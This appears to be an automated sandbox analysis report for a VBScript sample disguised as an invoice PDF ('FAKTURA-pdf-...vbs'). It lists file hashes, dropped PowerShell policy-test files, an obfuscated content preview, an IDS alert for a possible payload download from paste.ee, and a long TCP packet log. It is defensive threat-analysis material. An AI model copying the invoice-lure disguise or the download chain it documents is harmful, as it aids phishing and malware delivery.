                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdwx4ckn.x4e.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lopgtzat.ghk.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    Static File Info

                                                    General

                                                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Entropy (8bit):3.7377902053371383
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:FAKTURA-pdf-466366332.vbs
                                                    File size:496'406 bytes
                                                    MD5:90bd9fa957050b3641726fd4bb173281
                                                    SHA1:4fd94ee79b46a075b9cc10f9ceecaad705a19bf8
                                                    SHA256:07565a7b310e8082d9cfdaea1f0990c5b21ec6c08001272414cf63869019aa24
                                                    SHA512:769ec466d81b2fdc7e19741c0b71b41be1e746a0b582ff5913148b40993e7f6ab074ff73e44f4392bead209bba98a819cffaf4e8469ef44beaf1d54d435d1099
                                                    SSDEEP:12288:fCQNJjr/mJJw5NbHSoBFy8oJTaaPlI7lyxeBs9YVYzGqsYBnwhRD8PHNUvvtCC+y:46E9qAPuVb
                                                    TLSH:13B4091135EAB008F1F22FA356FD65E94FABB5652A36912E7048074F4B93E80CE51B73
                                                    File Content Preview:..r.d.c.e.C.i.f.U.m.q.L.L.Z.L.o.o.L.m.U.L.j.x.W.B.i.h.Z.i.b.u.Z.G.p.q.R.l.n.G.C.L.Z.U.h.j.G.K.N.m.p.k.f.O.B.Z.W.e.W.p.B.e.a.t.K.m.A.m.L.G. .=. .".z.C.o.c.e.A.k.W.L.x.p.U.B.P.P.t.L.n.b.b.i.A.f.L.t.z.N.x.d.Z.U.o.c.L.H.A.f.b.L.x.l.S.h.W.v.i.K.O.P.h.R.L.K.U.e

                                                    File Icon

                                                    Icon Hash:68d69b8f86ab9a86

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-04T11:25:23.864259+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.849709188.114.96.3443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 4, 2024 11:25:20.348097086 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.348145008 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.348234892 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.356765985 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.356796026 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.847908974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.847999096 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.852288961 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.852298021 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.852792978 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.864439964 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.907407999 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.970408916 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971638918 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971673012 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971687078 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.971698999 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971731901 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971745968 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.971750975 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.971788883 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.972353935 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.972415924 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.972453117 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.972457886 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.972505093 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.972542048 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.972547054 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.986365080 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:20.986440897 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:20.986447096 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.040126085 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.063906908 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.063939095 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.063957930 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.063977003 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.064011097 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.064011097 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.064029932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.064052105 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.064058065 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.064080000 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.064111948 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.064142942 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.066468954 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.066519976 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.066549063 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.066560984 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.066586018 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.066608906 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.153840065 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.153889894 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.153922081 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.153949976 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.153969049 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.153997898 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.155657053 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.155704021 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.155731916 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.155739069 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.155774117 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.155786991 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.157475948 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.157521963 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.157546043 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.157552004 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.157582998 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.157594919 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.159327030 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.159368038 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.159375906 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.159414053 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.159430027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.159440994 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.159490108 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.245017052 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245068073 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245260000 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.245275974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245321035 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.245702028 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245744944 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245779037 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.245784998 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.245801926 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.245820045 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.246486902 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.246527910 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.246562958 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.246568918 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.246591091 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.246604919 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.247919083 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.247963905 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.247991085 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.247997046 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.248023033 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.248034000 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.249053955 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.249094009 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.249178886 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.249186039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.249244928 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.249908924 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.249948025 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.249982119 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.249988079 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.250005960 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.250025988 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.335515022 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.335561991 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.335705996 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.335720062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.335763931 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.335946083 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.335985899 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.336014986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.336020947 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.336042881 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.336064100 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.336631060 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.336673021 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.336692095 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.336699009 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.336714983 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.336760044 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337203026 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337244034 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337274075 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337280035 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337301016 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337358952 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337763071 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337805986 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337826014 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337831974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.337850094 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.337866068 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.340708017 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.340729952 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.340775013 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.340781927 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.340818882 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.341325998 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341345072 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341388941 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.341397047 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341434002 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.341887951 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341908932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341952085 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.341959953 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.341995955 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.426753044 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.426784039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.426878929 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.426913023 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.426949978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.427495956 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.427520990 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.427555084 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.427563906 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.427584887 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.427599907 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428114891 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428138018 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428175926 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428193092 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428210974 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428229094 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428688049 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428709030 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428744078 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428750992 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.428767920 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.428797007 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.429541111 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429568052 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429610014 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.429621935 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429636955 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429658890 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.429661989 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429681063 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.429681063 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.429755926 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.430391073 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430433035 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430450916 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.430461884 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430495024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.430675030 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430696964 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430747986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.430753946 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.430789948 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.516999006 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517030954 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517108917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.517137051 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517168999 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.517199993 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.517410994 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517432928 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517471075 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.517483950 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.517514944 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.517539978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518150091 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518172026 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518227100 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518239021 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518274069 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518302917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518678904 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518701077 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518744946 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518754959 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.518796921 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.518822908 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519361019 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519395113 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519431114 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519439936 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519476891 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519505024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519789934 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519810915 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519853115 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519867897 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.519902945 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.519932032 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.520277023 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.520298004 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.520371914 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.520380974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.520390034 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.520418882 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.521043062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521066904 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521107912 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.521117926 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.521143913 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.521163940 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608011961 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608040094 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608170986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608191013 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608252048 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608504057 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608525038 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608611107 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.608619928 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.608681917 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609132051 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609157085 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609194994 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609204054 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609231949 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609256983 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609522104 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609543085 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609579086 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.609582901 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.609627008 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611242056 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611268044 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611305952 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611310005 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.611330986 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.611357927 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613334894 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613358974 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613435984 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613441944 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613488913 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613512039 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613543034 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613548040 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:21.613573074 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613605976 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:21.613635063 CEST44349707185.199.108.133192.168.2.8
